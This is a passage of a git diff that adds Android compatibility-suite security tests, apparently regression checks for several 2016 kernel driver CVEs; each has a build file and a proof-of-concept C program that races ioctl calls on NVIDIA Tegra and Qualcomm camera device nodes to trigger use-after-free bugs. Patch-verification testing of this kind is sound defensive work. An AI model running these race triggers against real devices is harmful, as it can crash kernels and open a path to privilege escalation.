+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_STOP_KEEPON 0x11
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_keepon {
+ volatile __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_STOP_KEEPON DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_STOP_KEEPON, struct drm_tegra_keepon)
+
+int fd;
+pthread_t keepon_thread_id[KEEPON_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_keepon keepon_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* keepon_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_STOP_KEEPON, &keepon_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create keepon thread */
+ for(i = 0; i < KEEPON_THREAD_NUM; i++){
+ ret = pthread_create(keepon_thread_id + i, NULL, keepon_thread, NULL);
+ if(ret){
+ goto out_keepon_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set keepon */
+ keepon_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+
+out_keepon_thread:
+ /* kill keepon thread */
+ for(i = 0; i < KEEPON_THREAD_NUM; i++){
+ pthread_kill(keepon_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6736/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6736/Android.mk
new file mode 100644
index 0000000..fd7fc21
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6736/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6736
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6736/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6736/poc.c
new file mode 100644
index 0000000..77f4b7a
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6736/poc.c
@@ -0,0 +1,174 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define SUBMIT_THREAD_NUM 900
+#define TRY_TIMES SUBMIT_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SUBMIT 0x08
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_submit {
+ __u64 context;
+ __u32 num_syncpts;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 waitchk_mask;
+ __u32 timeout;
+ __u64 syncpts;
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 waitchks;
+ __u32 fence; /* Return value */
+ __u32 reserved0;
+ __u64 fences;
+ __u32 reserved1[2]; /* future expansion */
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
+
+int fd;
+pthread_t submit_thread_id[SUBMIT_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_submit submit_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* submit_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create submit thread */
+ for(i = 0; i < SUBMIT_THREAD_NUM; i++){
+ ret = pthread_create(submit_thread_id + i, NULL, submit_thread, NULL);
+ if(ret){
+ goto out_submit_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set submit */
+ submit_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+
+out_submit_thread:
+ /* kill submit thread */
+ for(i = 0; i < SUBMIT_THREAD_NUM; i++){
+ pthread_kill(submit_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8412/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8412/Android.mk
new file mode 100644
index 0000000..bba13f3
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8412/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8412
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8412/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8412/poc.c
new file mode 100644
index 0000000..d438b40
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8412/poc.c
@@ -0,0 +1,69 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <string.h>
+#include <stdint.h>
+#include <pthread.h>
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <signal.h>
+
+#define VIDIOC_MSM_ACTUATOR_CFG 0xc0d056c6
+#define MSM_SD_SHUTDOWN 0xc00856dd
+
+int fd;
+
+
+int main() {
+ long i;
+ int pid;
+ pthread_t th[6];
+ int argn[50] = {0};
+
+ fd = open("/dev/v4l-subdev7", 0x0ul );
+
+
+ argn[0] = 7;
+ syscall(__NR_ioctl, fd, VIDIOC_MSM_ACTUATOR_CFG, argn, 0, 0, 0);
+
+ pid = fork();
+ if(!pid){
+ argn[0] = 1;
+ while(1){
+ usleep(10);
+ syscall(__NR_ioctl, fd, VIDIOC_MSM_ACTUATOR_CFG, argn, 0, 0, 0);
+ }
+ }
+ i = 0;
+ while(1){
+ i++;
+ argn[0] = 7;
+ syscall(__NR_ioctl, fd, VIDIOC_MSM_ACTUATOR_CFG, argn, 0, 0, 0);
+
+ usleep(100);
+
+ argn[0] = 0;
+ syscall(__NR_ioctl, fd, MSM_SD_SHUTDOWN, argn, 0, 0, 0);
+
+ }
+
+ close(fd);
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8424/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8424/Android.mk
new file mode 100644
index 0000000..5ff169b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8424/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8424
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8424/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8424/poc.c
new file mode 100644
index 0000000..4460b88
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8424/poc.c
@@ -0,0 +1,138 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <stdlib.h>
+#include <errno.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+
+struct nvmap_handle_param {
+ __u32 handle; /* nvmap handle */
+ __u32 param; /* size/align/base/heap etc. */
+ unsigned long result; /* returns requested info*/
+};
+
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
+#define NVMAP_IOC_GET_ID _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
+#define NVMAP_IOC_GET_FD _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
+#define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
+
+int g_fd = -1;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+struct nvmap_create_handle* g_allocation = NULL;
+
+int open_driver() {
+ char* dev_path = "/dev/nvmap";
+ g_fd = open(dev_path, O_RDWR);
+ if (g_fd < 0) {
+ printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+ } else {
+ printf("[*] open file(%s) succ!\n", dev_path);
+ }
+ return g_fd;
+}
+
+void trigger_nvmap_create() {
+ ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
+ //printf("[*] NVMAP_IOC_CREATE, fd(%d), last error = %d\n", g_allocation->handle, errno);
+}
+
+void trigger_nvmap_free() {
+ static int data = 1024;
+ ioctl(g_fd, NVMAP_IOC_FREE, data);
+ //printf("[*] NVMAP_IOC_FREE last error = %d\n", errno);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+ printf("[*] setpriority(%d) errno = %d\n", privi, errno);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ printf("[*] sched_setaffinity(%ld) errno = %d\n", cpu_mask, errno);
+ }
+}
+
+void prepare_data() {
+ void* data = calloc(1, 0x1000);
+
+ g_allocation = (struct nvmap_create_handle*)data;
+ g_allocation->size = 1024;
+
+ mprotect(data, 0x1000, PROT_READ);
+ printf("[*] mprotect, error = %d\n", errno);
+}
+static int init = 0;
+void* race_thread(void* arg) {
+ setup_privi_and_affinity(0, 2);
+
+ int i;
+ while (1) {
+ if (init == 0) {
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ pthread_mutex_unlock(&mutex);
+ init = 1;
+ }
+ trigger_nvmap_free();
+ }
+}
+
+int main(int argc, char**argv) {
+ setup_privi_and_affinity(0, 1);
+ if (open_driver() < 0) {
+ return -1;
+ }
+ prepare_data();
+ pthread_t tid;
+ pthread_create(&tid, NULL, race_thread, NULL);
+ sleep(1);
+ while (1) {
+ if (init == 0)
+ pthread_cond_signal(&cond);
+ trigger_nvmap_create();
+ }
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8425/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8425/Android.mk
new file mode 100644
index 0000000..e984812
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8425/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8425
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8425/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8425/poc.c
new file mode 100644
index 0000000..498bca4
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8425/poc.c
@@ -0,0 +1,140 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define ERR(fmt, ...) printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno))
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+#define CLOSE_THREAD_NUM 100
+#define TRY_TIMES 900
+
+#define DEV "/dev/nvhost-vic"
+
+struct nvhost_channel_open_args {
+ __s32 channel_fd;
+};
+
+#define NVHOST_IOCTL_MAGIC 'H'
+#define NVHOST_IOCTL_CHANNEL_OPEN \
+ _IOR(NVHOST_IOCTL_MAGIC, 112, struct nvhost_channel_open_args)
+
+int fd;
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+pthread_t toggle_thread_id;
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ printf("[-] set affinity failed: [%d]-%s\n", errno, strerror(errno));
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ return;
+}
+
+volatile int target_fd;
+volatile int attack;
+void* close_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(attack){
+ usleep(200);
+ close(target_fd);
+ }
+
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+ struct nvhost_channel_open_args o_args = { 0 };
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ ERR("[-] open failed");
+ return 0;
+ } else {
+ printf("[+] open OK\n");
+ }
+
+ #if 1
+ ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ goto out_dev;
+ } else {
+ printf("[+] ioctl OK, fd = %d\n", o_args.channel_fd);
+ }
+
+ target_fd = o_args.channel_fd;
+ #endif
+
+ /* create close thread */
+ #if 1
+ attack = 1;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
+ if(ret){
+ goto out_close_thread;
+ }
+ }
+ #endif
+
+ #if 1
+ for(i = 0; i < TRY_TIMES; i++){
+ /* open */
+ ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+ usleep(200);
+ }
+ #endif
+
+out_close_thread:
+ attack = 0;
+ /* kill close thread */
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ if(close_thread_id[i])
+ pthread_join(close_thread_id[i], NULL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8426/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8426/Android.mk
new file mode 100644
index 0000000..a134d9c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8426/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8426
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8426/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8426/poc.c
new file mode 100644
index 0000000..c423416
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8426/poc.c
@@ -0,0 +1,147 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define ERR(fmt, ...) printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno))
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+#define CLOSE_THREAD_NUM 100
+#define TRY_TIMES 900
+
+#define DEV "/dev/nvhost-gpu"
+
+struct nvhost_channel_open_args {
+ __s32 channel_fd;
+};
+
+#define NVHOST_IOCTL_MAGIC 'H'
+#define NVHOST_IOCTL_CHANNEL_OPEN \
+ _IOR(NVHOST_IOCTL_MAGIC, 112, struct nvhost_channel_open_args)
+
+int fd;
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+pthread_t toggle_thread_id;
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
